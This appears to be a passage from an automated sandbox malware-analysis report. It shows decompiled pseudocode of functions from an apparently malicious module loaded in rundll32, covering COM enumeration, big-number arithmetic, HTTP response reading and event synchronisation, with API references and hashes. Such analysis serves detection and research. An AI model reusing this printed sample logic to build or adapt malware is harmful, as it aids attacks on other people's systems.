				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x547d27c; // 0x1f6a5a8
					_t5 = _t102 + 0x547e038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x547c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x547d27c; // 0x1f6a5a8
												_t28 = _t108 + 0x547e0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x547d27c; // 0x1f6a5a8
														_t33 = _t78 + 0x547e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                  0x054752fe
                                                  0x05475307
                                                  0x05475308
                                                  0x0547530c
                                                  0x05475312
                                                  0x05475318
                                                  0x05475321
                                                  0x05475327
                                                  0x05475331
                                                  0x05475333
                                                  0x05475339
                                                  0x0547533e
                                                  0x05475349
                                                  0x05475351
                                                  0x05475354
                                                  0x05475477
                                                  0x0547535a
                                                  0x0547535a
                                                  0x05475367
                                                  0x0547536d
                                                  0x05475373
                                                  0x05475377
                                                  0x0547537d
                                                  0x0547538a
                                                  0x0547538e
                                                  0x05475394
                                                  0x05475397
                                                  0x0547539d
                                                  0x054753a3
                                                  0x054753a9
                                                  0x054753ac
                                                  0x054753af
                                                  0x054753b5
                                                  0x054753be
                                                  0x054753c4
                                                  0x054753c5
                                                  0x054753c8
                                                  0x054753c9
                                                  0x054753ca
                                                  0x054753d2
                                                  0x054753d3
                                                  0x054753d4
                                                  0x054753d6
                                                  0x054753da
                                                  0x054753de
                                                  0x00000000
                                                  0x00000000
                                                  0x054753e4
                                                  0x054753ed
                                                  0x054753f3
                                                  0x054753fd
                                                  0x05475401
                                                  0x05475403
                                                  0x05475410
                                                  0x05475414
                                                  0x0547541c
                                                  0x05475421
                                                  0x05475433
                                                  0x05475435
                                                  0x0547543b
                                                  0x0547543b
                                                  0x05475444
                                                  0x05475444
                                                  0x05475446
                                                  0x0547544c
                                                  0x0547544c
                                                  0x0547544f
                                                  0x05475455
                                                  0x05475458
                                                  0x05475461
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x05475461
                                                  0x054753b5
                                                  0x054753af
                                                  0x05475397
                                                  0x05475467
                                                  0x05475467
                                                  0x0547546d
                                                  0x0547546d
                                                  0x05475473
                                                  0x05475473
                                                  0x0547547c
                                                  0x05475482
                                                  0x05475482
                                                  0x0547533e
                                                  0x0547548b

                                                  APIs
                                                  • SysAllocString.OLEAUT32(0547C2B0), ref: 05475349
                                                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 0547542B
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05475444
                                                  • SysFreeString.OLEAUT32(?), ref: 05475473
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloclstrcmp
                                                  • String ID:
                                                  • API String ID: 1885612795-0
                                                  • Opcode ID: e050ca5ae1350f9c0c95ab5262a8b2c34e675d6eabf7dfdfd8fa80622c7cd650
                                                  • Instruction ID: 4976d5c0b7137eaec742ddc6cad8fa031241e53aa9468961500b59b06474271c
                                                  • Opcode Fuzzy Hash: e050ca5ae1350f9c0c95ab5262a8b2c34e675d6eabf7dfdfd8fa80622c7cd650
                                                  • Instruction Fuzzy Hash: 7A512A75E00519EFCB04DFA8C8889EEB7BAFF88705B148599E915AB310D731AD01DFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05471017, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E05471017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E0547A7AA(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E0547968F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E05478967(_t101,  &_v236, _a8, _t96 - _t81);
					E05478967(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E0547968F(_t101, 0x547d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E0547968F(_a16, _a4);
						E05471D6C(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0547B0C8();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0547B0C2();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E05471FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E05478B62(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E05479100(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x547d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                  0x0547101a
                                                  0x05471026
                                                  0x0547102c
                                                  0x05471031
                                                  0x05471035
                                                  0x05471192
                                                  0x05471196
                                                  0x05471196
                                                  0x0547103b
                                                  0x0547103f
                                                  0x05471045
                                                  0x05471046
                                                  0x05471051
                                                  0x05471057
                                                  0x0547105c
                                                  0x0547105f
                                                  0x05471079
                                                  0x05471085
                                                  0x0547108e
                                                  0x05471098
                                                  0x0547109d
                                                  0x0547109f
                                                  0x054710a2
                                                  0x05471150
                                                  0x05471156
                                                  0x05471167
                                                  0x0547117a
                                                  0x0547118a
                                                  0x00000000
                                                  0x0547118f
                                                  0x054710ab
                                                  0x054710b2
                                                  0x054710b6
                                                  0x054710bc
                                                  0x054710be
                                                  0x054710c0
                                                  0x054710c2
                                                  0x054710c4
                                                  0x054710ce
                                                  0x054710d3
                                                  0x054710d5
                                                  0x054710d7
                                                  0x054710d8
                                                  0x054710d9
                                                  0x054710da
                                                  0x054710e1
                                                  0x054710e8
                                                  0x054710eb
                                                  0x054710eb
                                                  0x054710b8
                                                  0x054710b8
                                                  0x054710b8
                                                  0x054710f3
                                                  0x054710fb
                                                  0x05471104
                                                  0x05471109
                                                  0x05471109
                                                  0x0547110e
                                                  0x00000000
                                                  0x00000000
                                                  0x05471110
                                                  0x05471113
                                                  0x0547111d
                                                  0x00000000
                                                  0x00000000
                                                  0x0547111f
                                                  0x0547111f
                                                  0x05471129
                                                  0x05471109
                                                  0x0547110e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0547110e
                                                  0x05471133
                                                  0x05471136
                                                  0x05471139
                                                  0x05471140
                                                  0x05471140
                                                  0x0547114d
                                                  0x00000000
                                                  0x0547114d
                                                  0x05471048
                                                  0x0547104c
                                                  0x0547104d
                                                  0x0547104f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0547104f
                                                  0x00000000

                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 054710C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 054710DA
                                                  • memset.NTDLL ref: 0547117A
                                                  • memset.NTDLL ref: 0547118A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: 7e52e7c3463fb3156b0ac851c87a58a3c10e0210797414337f0c6b576b89779d
                                                  • Instruction ID: 4ba981c9bb2f3a6a43c47a1121779e9ae4ca0a1b90a507d9a130ca2f0eb547a1
                                                  • Opcode Fuzzy Hash: 7e52e7c3463fb3156b0ac851c87a58a3c10e0210797414337f0c6b576b89779d
                                                  • Instruction Fuzzy Hash: 1141A271B0028DABDB10DFA9CC84FEE7B75EF44310F10856AF916AB280DB709949CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547A9AB, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 0547A9BD
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • ResetEvent.KERNEL32(?), ref: 0547AA31
                                                  • GetLastError.KERNEL32 ref: 0547AA54
                                                  • GetLastError.KERNEL32 ref: 0547AAFF
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 71ac16a835cc675c7c0f2433e554354e4f56a90d181df6d5e17142d5f42c1fd7
                                                  • Instruction ID: 3b366c26f8b6043a173e9e2c827ecbaf0ecfd64b65341b283ff0ea987d2000e8
                                                  • Opcode Fuzzy Hash: 71ac16a835cc675c7c0f2433e554354e4f56a90d181df6d5e17142d5f42c1fd7
                                                  • Instruction Fuzzy Hash: BD418A72610609BBDB249FA6CC89EEF7FBDEF85700F00495AF142E1190EB71A944CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 054739BF, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E054739BF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x547d134() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x547d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E05472049(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x547d134() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E05479039(_v16);
							if(_t58 == 0) {
								_t58 = E05477A07(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E05471C47( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E05471C47( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                                  0x054739bf
                                                  0x054739ce
                                                  0x054739d3
                                                  0x054739d5
                                                  0x054739da
                                                  0x054739db
                                                  0x054739e0
                                                  0x054739e1
                                                  0x054739ec
                                                  0x05473a1d
                                                  0x05473a22
                                                  0x05473ae5
                                                  0x05473ae8
                                                  0x05473aee
                                                  0x05473aee
                                                  0x05473a2f
                                                  0x05473a37
                                                  0x05473ae2
                                                  0x00000000
                                                  0x05473ae2
                                                  0x05473a42
                                                  0x05473a49
                                                  0x05473a4c
                                                  0x05473ad4
                                                  0x05473ad5
                                                  0x05473ad5
                                                  0x05473adb
                                                  0x00000000
                                                  0x05473adb
                                                  0x05473a52
                                                  0x05473a54
                                                  0x05473a5a
                                                  0x05473a5b
                                                  0x05473a5b
                                                  0x05473a5e
                                                  0x05473a61
                                                  0x05473a67
                                                  0x05473a6c
                                                  0x05473a6d
                                                  0x05473a72
                                                  0x05473a75
                                                  0x05473a80
                                                  0x00000000
                                                  0x00000000
                                                  0x05473a88
                                                  0x05473a90
                                                  0x05473ab9
                                                  0x05473abc
                                                  0x05473ac3
                                                  0x05473ace
                                                  0x05473ace
                                                  0x00000000
                                                  0x05473ac3
                                                  0x05473a9c
                                                  0x05473aa0
                                                  0x00000000
                                                  0x00000000
                                                  0x05473aa2
                                                  0x05473aa7
                                                  0x00000000
                                                  0x00000000
                                                  0x05473aa9
                                                  0x05473aa9
                                                  0x05473aae
                                                  0x00000000
                                                  0x00000000
                                                  0x05473ab0
                                                  0x05473ab1
                                                  0x05473ab4
                                                  0x05473ab4
                                                  0x05473a5b
                                                  0x054739f4
                                                  0x054739fc
                                                  0x05473a15
                                                  0x05473a17
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x05473a17
                                                  0x05473a08
                                                  0x05473a0c
                                                  0x00000000
                                                  0x00000000
                                                  0x05473a12
                                                  0x00000000

                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 054739D5
                                                  • GetLastError.KERNEL32 ref: 054739EE
                                                    • Part of subcall function 05471C47: WaitForMultipleObjects.KERNEL32(00000002,0547AA72,00000000,0547AA72,?,?,?,0547AA72,0000EA60), ref: 05471C62
                                                  • ResetEvent.KERNEL32(?), ref: 05473A67
                                                  • GetLastError.KERNEL32 ref: 05473A82
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: bfbd6c4c0425e3958b08ed7f402f8e90376d26b3f643c66d94623e719cf2d755
                                                  • Instruction ID: aabee46709913dcb15708981fde217e69e4feca2a4ff54c0f43b25d139289921
                                                  • Opcode Fuzzy Hash: bfbd6c4c0425e3958b08ed7f402f8e90376d26b3f643c66d94623e719cf2d755
                                                  • Instruction Fuzzy Hash: D131A832600A4CABDF11DFA5CC46EEF77BAFF84250F1009AAE51597250EB70E945DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05473AEF, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 05473B46
                                                  • SysAllocString.OLEAUT32(05471885), ref: 05473B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05473B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05473BAB
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: f9c45a76207ccb5ec6579ee99a541f54da625fe6e671c9c4e358d8de4ac5e36a
                                                  • Instruction ID: fb745b57fc907c6f5a32fed8bba889a9c05ef167b53fe33d6a95e16e441af9a5
                                                  • Opcode Fuzzy Hash: f9c45a76207ccb5ec6579ee99a541f54da625fe6e671c9c4e358d8de4ac5e36a
                                                  • Instruction Fuzzy Hash: 0231E7B191014DEF8B05DFA8D4C48EE7BB9FF48350B10886EF50AA7211DB359A45DF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 054742EA, Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E054742EA(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x547d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x547d27c; // 0x1f6a5a8
				_t3 = _t8 + 0x547e862; // 0x61636f4c
				_t25 = 0;
				_t30 = E05477A9A(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x547d2a8, 1, 0, _t30);
					E05479039(_t30);
				}
				_t12 =  *0x547d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E0547757F() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E0547205E(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x547d0f0( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E0547A501(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                                                  0x054742eb
                                                  0x054742f2
                                                  0x054742fc
                                                  0x05474300
                                                  0x05474306
                                                  0x05474315
                                                  0x0547431c
                                                  0x05474320
                                                  0x05474332
                                                  0x05474334
                                                  0x05474334
                                                  0x05474339
                                                  0x05474340
                                                  0x05474395
                                                  0x05474395
                                                  0x0547439b
                                                  0x0547439d
                                                  0x0547439d
                                                  0x054743a7
                                                  0x054743ab
                                                  0x054743bd
                                                  0x054743bd
                                                  0x054743c1
                                                  0x054743c7
                                                  0x054743c7
                                                  0x00000000
                                                  0x05474359
                                                  0x0547435e
                                                  0x05474366
                                                  0x05474368
                                                  0x0547436c
                                                  0x0547436c
                                                  0x05474379
                                                  0x0547437d
                                                  0x05474381
                                                  0x054743d6
                                                  0x054743dc
                                                  0x054743dc
                                                  0x0547438f
                                                  0x05474393
                                                  0x054743ca
                                                  0x054743cc
                                                  0x054743cf
                                                  0x054743cf
                                                  0x00000000
                                                  0x054743cc
                                                  0x05474393
                                                  0x00000000
                                                  0x0547437d

                                                  APIs
                                                    • Part of subcall function 05477A9A: lstrlen.KERNEL32(054723E9,00000000,00000000,00000027,00000005,00000000,00000000,054796DA,74666F53,00000000,054723E9,0547D00C,?,054723E9), ref: 05477AD0
                                                    • Part of subcall function 05477A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 05477AF4
                                                    • Part of subcall function 05477A9A: lstrcat.KERNEL32(00000000,00000000), ref: 05477AFC
                                                  • CreateEventA.KERNEL32(0547D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,05473CA0,?,00000001,?), ref: 0547432B
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,05473CA0,00000000,00000000,?,00000000,?,05473CA0,?,00000001,?,?,?,?,05476880), ref: 05474389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,05473CA0,?,00000001,?), ref: 054743B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,05473CA0,?,00000001,?,?,?,?,05476880), ref: 054743CF
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 8c5060f233bdceba93409d70392cf86f41c0b58e095c314dda01fe74baf350c9
                                                  • Instruction ID: 1896e0cff7faf9c575c238f33359de55e34ddbbdd0c4486e0f1a32a8b1a48d97
                                                  • Opcode Fuzzy Hash: 8c5060f233bdceba93409d70392cf86f41c0b58e095c314dda01fe74baf350c9
                                                  • Instruction Fuzzy Hash: BA21283271025D9BCB315EE95C48AFB7BA9FF88710F16065BFA5AEB240DB71C8018690
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547A0B2, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 38%
                                                  			E0547A0B2(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x547d144; // 0x547ad81
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E05472049(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E05479039(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
